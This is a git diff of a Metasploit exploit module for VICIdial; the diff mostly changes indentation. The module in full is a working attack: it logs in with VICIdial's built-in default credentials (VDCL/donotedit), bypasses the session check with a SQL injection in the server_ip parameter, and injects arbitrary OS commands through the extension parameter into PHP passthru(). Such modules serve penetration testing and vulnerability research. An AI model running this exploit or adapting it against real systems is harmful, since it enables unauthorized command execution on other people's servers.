diff --git a/modules/exploits/multi/http/vicidial_manager_send_cmd_exec.rb b/modules/exploits/multi/http/vicidial_manager_send_cmd_exec.rb index 305a0d8562..848d5000c2 100755 --- a/modules/exploits/multi/http/vicidial_manager_send_cmd_exec.rb +++ b/modules/exploits/multi/http/vicidial_manager_send_cmd_exec.rb @@ -6,109 +6,109 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = ExcellentRanking - include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpClient - def initialize(info = {}) - super(update_info(info, - 'Name' => 'VICIdial Manager Send OS Command Injection', - 'Description' => %q{ - The file agc/manager_send.php in the VICIdial web application uses - unsanitized user input as part of a command that is executed using the PHP - passthru() function. A valid username, password and session are needed to access - the injection point. Fortunately, VICIdial has two built-in accounts with default - passwords and the manager_send.php file has a SQL injection vulnerability that can - be used to bypass the session check as long as at least one session has been - created at some point in time. The results of the injected command are returned - as part of the response from the web server. Affected versions include 2.7RC1, - 2.7, and 2.8-403a. Other versions are likely affected as well. The default - credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit. - }, - 'Author' => - [ - 'Adam Caudill ', # Vulnerability discovery - 'AverageSecurityGuy ' # Metasploit Module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'http://www.openwall.com/lists/oss-security/2013/10/23/10' ] - ], - 'DisclosureDate' => 'Oct 23 2013', - 'Privileged' => true, - 'Platform' => ['linux','unix'], - 'Payload' => - { - 'DisableNops' => true - }, - 'Targets' => - [ - [ 'CMD', - { - 'Arch' => ARCH_CMD, - 'Platform' => 'unix' - } - ], - ], - 'DefaultTarget' => 0 - )) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'VICIdial Manager Send OS Command Injection', + 'Description' => %q{ + The file agc/manager_send.php in the VICIdial web application uses + unsanitized user input as part of a command that is executed using the PHP + passthru() function. A valid username, password and session are needed to access + the injection point. Fortunately, VICIdial has two built-in accounts with default + passwords and the manager_send.php file has a SQL injection vulnerability that can + be used to bypass the session check as long as at least one session has been + created at some point in time. The results of the injected command are returned + as part of the response from the web server. Affected versions include 2.7RC1, + 2.7, and 2.8-403a. Other versions are likely affected as well. The default + credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit. + }, + 'Author' => + [ + 'Adam Caudill ', # Vulnerability discovery + 'AverageSecurityGuy ' # Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://www.openwall.com/lists/oss-security/2013/10/23/10' ] + ], + 'DisclosureDate' => 'Oct 23 2013', + 'Privileged' => true, + 'Platform' => ['linux','unix'], + 'Payload' => + { + 'DisableNops' => true + }, + 'Targets' => + [ + [ 'CMD', + { + 'Arch' => ARCH_CMD, + 'Platform' => 'unix' + } + ], + ], + 'DefaultTarget' => 0 + )) - register_options( - [ - OptString.new('USERNAME', [true, 'VICIdial Username', 'VDCL']), - OptString.new('PASSWORD', [true, 'VICIdial Password', 'donotedit']) - ], self.class) - end + register_options( + [ + OptString.new('USERNAME', [true, 'VICIdial Username', 'VDCL']), + OptString.new('PASSWORD', [true, 'VICIdial Password', 'donotedit']) + ], self.class) + end - def request(cmd) - begin - res = send_request_cgi({ - 'uri' => '/agc/manager_send.php', - 'method' => 'GET', - 'vars_get' => { - "enable_sipsak_messages" => "1", - "allow_sipsak_messages" => "1", - "protocol" => "sip", - "ACTION" => "OriginateVDRelogin", - "session_name" => rand_text_alpha(12), # Random session name - "server_ip" => "' OR '1' = '1", # SQL Injection to validate the session - "extension" => ";#{cmd};", - "user" => datastore['USERNAME'], - "pass" => datastore['PASSWORD'] - } - }) + def request(cmd) + begin + res = send_request_cgi({ + 'uri' => '/agc/manager_send.php', + 'method' => 'GET', + 'vars_get' => { + "enable_sipsak_messages" => "1", + "allow_sipsak_messages" => "1", + "protocol" => "sip", + "ACTION" => "OriginateVDRelogin", + "session_name" => rand_text_alpha(12), # Random session name + "server_ip" => "' OR '1' = '1", # SQL Injection to validate the session + "extension" => ";#{cmd};", + "user" => datastore['USERNAME'], + "pass" => datastore['PASSWORD'] + } + }) - if res.nil? or res.code == 404 - vprint_error("#{rhost}:#{rport} - No response or page not found.") - return nil - end + if res.nil? or res.code == 404 + vprint_error("#{rhost}:#{rport} - No response or page not found.") + return nil + end - if res.body =~ /Invalid Username\/Password/ - vprint_error("#{rhost}:#{rport} - Invalid Username or Password.") - return nil - end + if res.body =~ /Invalid Username\/Password/ + vprint_error("#{rhost}:#{rport} - Invalid Username or Password.") + return nil + end - return res - rescue ::Rex::ConnectionError - vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") - return nil - end - end + return res + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return nil + end + end - def check - resp = request('ls -a .') - - vprint_line(resp.body) - if resp.body =~ /\.\n\.\.\n/m - return Exploit::CheckCode::Vulnerable - else - return Exploit::CheckCode::Detected - end - end + def check + resp = request('ls -a .') - def exploit - request("#{payload.encode}") - end + vprint_line(resp.body) + if resp.body =~ /\.\n\.\.\n/m + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Detected + end + end + + def exploit + request("#{payload.encode}") + end end